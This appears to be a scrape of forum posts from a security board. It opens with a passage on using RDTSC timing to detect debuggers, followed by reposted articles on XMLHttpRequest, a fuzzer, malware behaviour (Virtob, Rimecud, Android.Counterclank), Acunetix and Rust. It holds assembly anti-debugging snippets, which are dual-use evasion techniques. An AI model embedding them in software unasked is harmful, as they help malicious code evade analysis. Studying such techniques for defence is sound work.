EDX2-EDX1 = 00000000 [06] cycle: EAX2-EAX1 = 00d9c25c * EDX2-EDX1 = 00000000 [07] cycle: EAX2-EAX1 = 00d9d34c * EDX2-EDX1 = 00000000 [08] cycle: EAX2-EAX1 = 01f2a304 * EDX2-EDX1 = 00000001 [09] cycle: EAX2-EAX1 = 00da6e4c * EDX2-EDX1 = 00000000 [10] cycle: EAX2-EAX1 = 01593a9e * EDX2-EDX1 = 00000000 [11] cycle: EAX2-EAX1 = 01dc7ab8 * EDX2-EDX1 = 00000000 [12] cycle: EAX2-EAX1 = 00f0d75a * EDX2-EDX1 = 00000000 [13] cycle: EAX2-EAX1 = 0113998c * EDX2-EDX1 = 00000000 [14] cycle: EAX2-EAX1 = 01c7dfc8 * EDX2-EDX1 = 00000000 [15] cycle: EAX2-EAX1 = 00ddedc0 * EDX2-EDX1 = 00000000 [16] cycle: EAX2-EAX1 = 00cc2308 * EDX2-EDX1 = 00000000 [17] cycle: EAX2-EAX1 = 02318eb8 * EDX2-EDX1 = 00000000 [18] cycle: EAX2-EAX1 = 00c83ec0 * EDX2-EDX1 = 00000000 [19] cycle: EAX2-EAX1 = 02f7e078 * EDX2-EDX1 = 00000000 Olly Trace over: --------------- [00] cycle: EAX2-EAX1 = 00683da4 * EDX2-EDX1 = 00000000 [01] cycle: EAX2-EAX1 = 0063666c * EDX2-EDX1 = 00000000 [02] cycle: EAX2-EAX1 = 006f1778 * EDX2-EDX1 = 00000000 [03] cycle: EAX2-EAX1 = 006d7618 * EDX2-EDX1 = 00000000 [04] cycle: EAX2-EAX1 = 0062c1d0 * EDX2-EDX1 = 00000000 [05] cycle: EAX2-EAX1 = 0062cca4 * EDX2-EDX1 = 00000000 [06] cycle: EAX2-EAX1 = 00787178 * EDX2-EDX1 = 00000000 [07] cycle: EAX2-EAX1 = 00628d34 * EDX2-EDX1 = 00000000 [08] cycle: EAX2-EAX1 = 00e6ab20 * EDX2-EDX1 = 00000000 [09] cycle: EAX2-EAX1 = 006daab4 * EDX2-EDX1 = 00000000 [10] cycle: EAX2-EAX1 = 00647750 * EDX2-EDX1 = 00000000 [11] cycle: EAX2-EAX1 = 008b898c * EDX2-EDX1 = 00000000 [12] cycle: EAX2-EAX1 = 006e00e4 * EDX2-EDX1 = 00000000 [13] cycle: EAX2-EAX1 = 009bc054 * EDX2-EDX1 = 00000000 [14] cycle: EAX2-EAX1 = 00634200 * EDX2-EDX1 = 00000000 [15] cycle: EAX2-EAX1 = 0074e0d8 * EDX2-EDX1 = 00000000 [16] cycle: EAX2-EAX1 = 0062f19c * EDX2-EDX1 = 00000000 [17] cycle: EAX2-EAX1 = 006404cc * EDX2-EDX1 = 00000000 [18] cycle: EAX2-EAX1 = 009db384 * EDX2-EDX1 = 00000000 [19] cycle: EAX2-EAX1 = 00629824 * EDX2-EDX1 = 00000000 Conclusions for tracing ----------------------- As you can see the EAX2-EAX1 difference is much bigger when program is traced then if it is clearly runned - well it's logical. We will use the fact for coding some examples (code below) now lets check single stepping mode: Some single stepping: -------------------- [00] cycle: EAX2-EAX1 = c387c6c0 * EDX2-EDX1 = 00000001 [01] cycle: EAX2-EAX1 = 43d8444c * EDX2-EDX1 = 00000000 [02] cycle: EAX2-EAX1 = 465f9ffc * EDX2-EDX1 = 00000000 [03] cycle: EAX2-EAX1 = 478f50d8 * EDX2-EDX1 = 00000000 [04] cycle: EAX2-EAX1 = 46068f98 * EDX2-EDX1 = 00000000 [05] cycle: EAX2-EAX1 = 46767aac * EDX2-EDX1 = 00000000 [06] cycle: EAX2-EAX1 = 4f2e79dc * EDX2-EDX1 = 00000001 [07] cycle: EAX2-EAX1 = 4b0fc400 * EDX2-EDX1 = 00000001 [08] cycle: EAX2-EAX1 = 42835c20 * EDX2-EDX1 = 00000001 [09] cycle: EAX2-EAX1 = 47285570 * EDX2-EDX1 = 00000000 [10] cycle: EAX2-EAX1 = 45cb4330 * EDX2-EDX1 = 00000000 [11] cycle: EAX2-EAX1 = 49d9c1b8 * EDX2-EDX1 = 00000000 [12] cycle: EAX2-EAX1 = 47b0c5e0 * EDX2-EDX1 = 00000000 [13] cycle: EAX2-EAX1 = 45ccf9ac * EDX2-EDX1 = 00000000 [14] cycle: EAX2-EAX1 = 3bb0d8b4 * EDX2-EDX1 = 00000000 [15] cycle: EAX2-EAX1 = 406d1abc * EDX2-EDX1 = 00000000 [16] cycle: EAX2-EAX1 = 4b1ab80c * EDX2-EDX1 = 00000001 [17] cycle: EAX2-EAX1 = 4111b198 * EDX2-EDX1 = 00000001 [18] cycle: EAX2-EAX1 = 462c9e94 * EDX2-EDX1 = 00000001 [19] cycle: EAX2-EAX1 = 48844964 * EDX2-EDX1 = 00000000 Conclusions for single stepping ------------------------------- - the EAX2-EAX1 is very high (look trace output to compare) - also notice the facts EDX2-EDX1 is sometimes 1, so this is a very good proof of single stepping player around. Some crazy examples ------------------- Try to play with debugger and with breakpoints on _lopen MAX_EAX_TIMING was calculated on the C program output somelines before this code + some extra range. EXAMPLE 1 ---------- ;------------------ SNIP ----------------------------------------- MAX_EAX_TIMING equ 000eeeeeh rdtsc push eax push edx push OF_READ @pushsz "\.\\RANDOM" @callx _lopen rdtsc sub edx,dword ptr [esp] test edx,edx jnz found_single_step ; or very slow processor sub eax,dword ptr [esp+4] cmp eax,MAX_EAX_TIMING jge found_debugger_action exit: push 0 @callx ExitProcess found_single_step: @debug "Single step action was found",0 jmp exit found_debugger_action: @debug "Debugger action was found",0 jmp exit ;------------------ SNIP ----------------------------------------- EXAMPLE 2 --------- And here is the second example, which calculates the clock time of first _lopen execution and then executes next _lopen and calculates the same thing. Then compares both results (including some extra range of 0aaaaaah - just to cover some speciall EAX2-EAX1 cases in clear mode - look tables above). If the final difference is larger then 0 we got some bad guy on us. ;------------------ SNIP ----------------------------------------- rdtsc push eax push edx push OF_READ @pushsz "\.\\RANDOM" @callx _lopen rdtsc sub edx,dword ptr [esp] test edx,edx jnz found_single_step ; or very slow processor sub eax,dword ptr [esp+4] xchg ebx,eax rdtsc push eax push OF_READ @pushsz "\.\\RANDOM" @callx _lopen ; ---> break on this call rdtsc sub eax,dword ptr [esp] add eax,0aaaaah ; some extra value sub ebx,eax cmp ebx,0 jle exit jmp found_debugger_action exit: push 0 @callx ExitProcess found_single_step: @debug "Single step action was found",0 jmp exit found_debugger_action: @debug "Debugger action was found",0 jmp exit ;------------------ SNIP ----------------------------------------- Sursa: http://piotrbania.com/all/articles/playing_with_rdtsc.txt

[h=1]HTML in XMLHttpRequest[/h] The W3C XMLHttpRequest specification adds HTML parsing support to XMLHttpRequest, which originally supported only XML parsing. This feature allows Web apps to obtain an HTML resource as a parsed DOM using XMLHttpRequest. [h=3]Limitations[/h] To discourage the synchronous use of XMLHttpRequest, HTML support is not available in the synchronous mode. Also, HTML support is only available if the responseType property has been set to "document". This limitation avoids wasting time parsing HTML uselessly when legacy code uses XMLHttpRequest in the default mode to retrieve responseText for text/html resources. Also, this limitation avoids problems with legacy code that assumes that responseXML is null for HTTP error pages (which often have a text/html response body). [h=3]Usage[/h] Retrieving an HTML resource as a DOM using XMLHttpRequest works just like retrieving an XML resource as a DOM using XMLHttpRequest, except you can't use the synchronous mode and you have to explicitly request a document by assigning the string "document" to the responseType property of the XMLHttpRequest object after calling open() but before calling send(). var xhr = new XMLHttpRequest(); xhr.onload = function() { alert(this.responseXML.title); } xhr.open("GET", "file.html"); xhr.responseType = "document"; xhr.send(); [h=3]Feature Detection[/h] There are two challenges to detecting if a browser supports HTML parsing in XMLHttpRequest. First, the detection result is obtained asynchronously, because HTML support is only available in the asynchronous mode. Second, you have to actually fetch a test document over HTTP, because testing with a data: URL would end up testing data: URL support instead. Thus, to detect HTML support, a test HTML file is needed on the server. This test file is small and is not well-formed XML: <title>&&<</title> If the file is named detect.html, the following function can be used for detecting HTML parsing support: function detectHtmlInXhr(callback) { if (!window.XMLHttpRequest) { window.setTimeout(function() { callback(false); }, 0); return; } var done = false; var xhr = new window.XMLHttpRequest(); xhr.onreadystatechange = function() { if (this.readyState == 4 && !done) { done = true; callback(!!(this.responseXML && this.responseXML.title && this.responseXML.title == "&&<")); } } xhr.onabort = xhr.onerror = function() { if (!done) { done = true; callback(false); } } try { xhr.open("GET", "detect.html"); xhr.responseType = "document"; xhr.send(); } catch (e) { window.setTimeout(function() { if (!done) { done = true; callback(false); } }, 0); } } The argument callback is a function that will be called asynchronously with true as the only argument if HTML parsing is supported and false as the only argument if HTML parsing is not supported. [h=3]Character Encoding[/h] If the character encoding is declared in the HTTP Content-Type header, that character encoding is used. Failing that, if there is a byte order mark, the encoding indicated by the byte order mark is used. Failing that, if the is a meta tag that declares the encoding within the first 1024 bytes of the file, that encoding is used. Otherwise, the file is decoded as UTF-8. Sursa: https://developer.mozilla.org/en/HTML_in_XMLHttpRequest

UniOFuzz 0.1.2-beta - Universal fuzzing tool Released UniOFuzz version 0.1.2-beta - the universal fuzzing tool for browsers, web services, files, programs and network services/ports released by nullsecurity team. Video pigtail23, Developer of UniOFuzz demonstrated the tool in above Video. Download UniOFuzz Sursa: UniOFuzz 0.1.2-beta - Universal fuzzing tool Released | The Hacker News (THN)

[h=1]Virus infects worm by mistake[/h] 24 January 2012 New malware morphs into different shapes unattended by humans Ten years ago, there was a clear-cut distinction between Trojans, viruses and worms. They all had their own features specific to one family of malware only. As more people connected to the internet, cyber-criminals started mixing ingredients to maximize impact. And here I’m thinking Trojans with worm capabilities or viruses with Trojan features, and so on. Now, another “practice” has silently emerged: the file infector that accidentally parasites another e-threat. A virus infects executable files; and a worm is an executable file. If the virus reaches a PC already compromised by a worm, the virus will infect the exe files on that PC - including the worm. When the worm spreads, it will carry the virus with it. Although this happens unintentionally, the combined features from both pieces of malware will inflict a lot more damage than the creators of either piece of malware intended. While most file infectors have inbuilt spreading mechanisms, just like Trojans and worms (spreading routines for RDP, USB, P2P, chat applications, or social networks), some cannot replicate or spread between computers. And it seems a great idea to “outsource” the transportation mechanism to a different piece of malware (i.e. by piggybacking a worm). Most likely these Frankenmalware, or “malware sandwiches,” take place spontaneously. The virus actually infects by mistake another piece of malware and ends up using its capabilities to spread. Bitdefender’s Antimalware Lab identified no less than 40,000 such malware symbioses out of a sample pool of 10 million files. One such case is the Virtob file infector, whose malicious code has been found infecting worms like OnlineGames, the ancient Mydoom or the more advanced Bifrose backdoor Trojan. From the numerous samples of worms infected by viruses, we picked out the Win32.Worm.Rimecud -Win32.Virtob pair. A few words about Win32.Worm.Rimecud Win32.Worm.Rimecud is your typical worm with a state-of-the-art spreading apparatus. For propagation it uses file-sharing applications (Ares P2P, BearShare, iMesh, Shareaza. Kazaa, DC++, eMule, LimeWire), USB devices, Microsoft MSN Messenger (sends all contacts links to sites that host malware) and network drives mapped locally. Once on the system, Rimecud injects its code into explorer.exe and steals passwords pertaining to e-banking, on-line shopping, social networking or e-mail accounts from Mozilla Firefox and Internet Explorer. In the meantime its backdoor component enables it to connect to the C&C servers and fetch commands such as flood, download and execute further malware on the compromised PC. On top of that, the worm looks for a VNC server (remote control software) that would allow the attacker remote access and control of the compromised PC. And certain details about Win32.Virtob Bitdefender labs have recently seen attached a file infector to the above mentioned worm - Win32.Virtob. This virus is known to infect executable files with .exe or .scr extensions by affixing a piece of malicious code to those files. The worm is an executable file, so chances are it also gets infected by the virus if it’s on the same computer. Virtob then instructs the compromised executable files to firstly run the viral code (by changing the entry point) and only afterwards gives control back to the original file. Certainly this also applies to the worm - its code will be executed only after the virus code has been launched. When its code is successfully loaded into the memory, Virtob connects to two IRC servers that are in fact C&C servers, and with the help of its backdoor component, the virus is ready to receive commands from a remote attacker via the Internet. By injecting its code into winlogon.exe and then adding this process to the firewall exception list, the virus makes sure it is granted complete Internet access and ensures its persistence – Winlogon is a critical process that, if terminated, will crash the computer. Afterwards, it infects HTML, HTM, PHP, ASP files by injecting IFrames that might silently load content from malware-laden pages. Now, imagine these two pieces of malware working together - willingly or not - from and on the same compromised system. That PC faces a twofold malware with twice as many command and control servers to query for instructions; moreover, there are two backdoors open, two attack techniques active and various spreading methods put in place. Where one fails, the other succeeds. Multiple Frankenware infections possible: If, by utter bad luck, the computer has more than one worm that applies to the virus specifications, the virus could infect more than one worm on the system. However, the virus might as well only infect the executable files in certain system locations, or of a certain length. Other viruses look for certain strings that pertain to other pieces of malware which will remain uninfected if found on the compromised system. So, one worm can be infected while others on the same system are not. If one of the two (whether the virus or the worm) is caught by the AV, the other might pass undetected. Perhaps if we think of an infected file (possibly the virus) that needs to be analyzed separately and a piece of code is taken out and looked at, maybe then someone discovers also the worm. If the worm is detected based on a signature, the worm is simply wiped out from the compromised system, without any further analysis. This would make it easier for the virus to pass unseen. There’s no rule. And two hypothetical scenarios: Hypothetical scenario No. 1: Imagine a worm like Downadup, that has been spreading constantly around the world for three years now (70,000 infected systems in the last six months alone), being infected with a virus. On the one hand, Downadup prevents the system from updating the OS and the AV solution locally installed; and on the other hand the virus may have rootkit capabilities and open a backdoor. Downadup spreads around the world constantly, which makes it a great propagation tool; not to mention that it took AVs more than half a year, and almost a million infections, to discover it. If this had carried along a virus, all those users would have suffered greater damage. And disinfection would be more complicated. Hypothetical scenario No. 2: Imagine that a worm is infected by a file infector (virus). And an AV detects the file infector first and tries to disinfect the files, which include the worm. In some rare cases disinfecting compromised files leaves behind clean files that are at the same time altered (not identical to the original anymore). They maintain their functionality but are slightly different in form. As most files are detected according to signatures and not based on their behavior (heuristically), an altered worm (disinfected along with other files that have been compromised by a file infector and disinfected by an antivirus) may not be caught anymore by the signature applied to the original file (that had been modified after disinfection). Disinfection might this way lead to a mutation that can actually help the worm. This article is based on the technical information provided courtesy of Doina Cosovan & R?zvan Benchea, Bitdefender VirusAnalysts. All product and company names mentioned herein are for identification purposes only and are the property of, and may be trademarks of, their respective owners. Sursa: Virus infects worm by mistake - MalwareCity : Computer Security Blog

[h=1]Android.Counterclank Found in Official Android Market[/h]by Irfan Asrar Symantec has identified multiple publisher IDs on the Android Market that are being used to push out Android.Counterclank. This is a minor modification of Android.Tonclank, a bot-like threat that can receive commands to carry out certain actions, as well as steal information from the device. For each of these malicious applications, the malicious code has been grafted on to the main application in a package called “apperhand”. When the package is executed, a service with the same name may be seen running on a compromised device. Another sign of an infection is the presence of the Search icon above on the home screen. The combined download figures of all the malicious apps indicate that Android.Counterclank has the highest distribution of any malware identified so far this year. [TABLE=width: 450] [TR=bgcolor: #CCCCCC] [TD=width: 100]Publisher[/TD] [TD=width: 200]Malicious App Title[/TD] [TD=width: 132]Category[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Counter Elite Force[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Counter Strike Ground Force[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]CounterStrike Hit Enemy[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Heart Live Wallpaper[/TD] [TD]Entertainment[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Hit Counter Terrorist[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Stripper Touch girl[/TD] [TD]Entertainment[/TD] [/TR] [TR] [TD]Ogre Games[/TD] [TD]Balloon Game[/TD] [TD]Sports Games[/TD] [/TR] [TR] [TD]Ogre Games[/TD] [TD]Deal & Be Millionaire[/TD] [TD]Sports Games[/TD] [/TR] [TR] [TD]Ogre Games[/TD] [TD]Wild Man[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]redmicapps[/TD] [TD]Pretty women lingerie puzzle[/TD] [TD]Photography[/TD] [/TR] [TR] [TD]redmicapps[/TD] [TD]Sexy Girls Photo Game[/TD] [TD]Lifestyle[/TD] [/TR] [TR] [TD]redmicapps[/TD] [TD]Sexy Girls Puzzle[/TD] [TD]Brain & Puzzle[/TD] [/TR] [TR] [TD]redmicapps[/TD] [TD]Sexy Women Puzzle[/TD] [TD]Brain & Puzzle[/TD] [/TR] [/TABLE] Symantec is continuing with further investigation and we will post more information as we discover it. Sursa: Android.Counterclank Found in Official Android Market | Communauté Symantec Connect

Acunetix Web Vulnerability Scanner By MaxiSoler on 28 January 2012 in Tools with No Comments Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing. Improvements: The accuracy of Script Checks has been increased. The Acunetix development team is dedicated to continuously improve scan detection of security checks. The Graphical User Interface (GUI) has been enhanced in order to make menu navigation and usage easier and more effective than ever before. SSL security audit script is launched automatically when scanning a HTTPS website, regardless if port scanning is enabled or not. Added a number of new SQL Injection variants checks. Bug Fixes: HPP detection security script failed when testing input scheme with excluded variants Apply settings button not showing up in specific cases Fixed several issues related to pausing and resuming of crawler Fixed several issues when running multiple instances of the reporter Two backup files were being generated because of filename case insensitivity Filtering of wildcards from robots.txt This release candidate of Acunetix Web Vulnerability Scanner Version 8 is considered complete, stable, and suitable for testing. More Information: Acunetix v8 Manual Download Acunetix Web Vulnerability Scanner v8 RC Sursa: IT Vulnerability & ToolsWatch | Acunetix Web Vulnerability Scanner v8 Released Candidate Released

[h=2]Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++[/h]By Sebastian Anthony on January 24, 2012 at 6:52 am After more than five years in the pipeline, Mozilla Labs and the Rust community have released the first alpha — version 0.1 — of the Rust programming language compiler. The Rust language emphasizes concurrency and memory safety, and — if everything goes to plan — is ultimately being groomed to replace C++ as Mozilla’s compiled language of choice. Browser prototypes programmed in Rust will eventually emerge, and then one day Firefox — or parts of Firefox — might be re-written in Rust. A bit more about the language itself: Rust is a compiled, statically-typed, object-oriented programming language (and objects are immutable by default). The compiler is supported on Windows, Linux, and Mac. Feature-wise, Rust intentionally avoids any novel ideas, and instead builds upon existing, known features that are present in other languages. Syntax-wise, Rust uses curly braces {} like C, C++, or JavaScript, but as you can see in the code block below, the syntax is actually quite funky. [INDENT]use std; fn main(args: [str]) { std::io::println("hello world from '" + args[0] + "'!"); } [/INDENT] At this point we have to compare Rust to Go, Google’s new language. The Rust community explicitly says that it was not inspired by Go — development of Rust began before Go — but that other languages made by Rob Pike such as Newsqueak, Alef, and Limbo were influential. Feature-wise, the languages are quite similar, but Rust seems to be more security- and safety-oriented. Where Go has global garbage collection, null pointers, and shared mutable states, Rust GC is optional and per-task, null pointers are not allowed, and objects are immutable by default. As far as the state of the language is concerned, most of its features work but are incomplete. Standard library APIs are subject to change. Performance isn’t yet up to scratch (eventually it should be as fast as C++). In other words, you can dive in and play with Rust, but future versions of the compiler will break your code. To get started, hit up the Rust language website — or read the Rust 0.1 release notes Sursa: Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++ | ExtremeTech

MediaFire: "Suntem o companie americana si respectam legile americane". (ceva de genul) O sa continue sa ofere servicii de hosting.

La munca, nu la intins mana. Fara astfel de rahaturi aici, o sa ramaneti intreaga viata niste hoti. Sper sa putreziti in puscarie. Ban permanent.

Ah, stiam ca a mai fost postat, dar credeam ca versiunea in limba germana, de aceea am postat.

Vedeti asta: [h=1]Linux Local Privilege Escalation via SUID /proc/pid/mem Write[/h]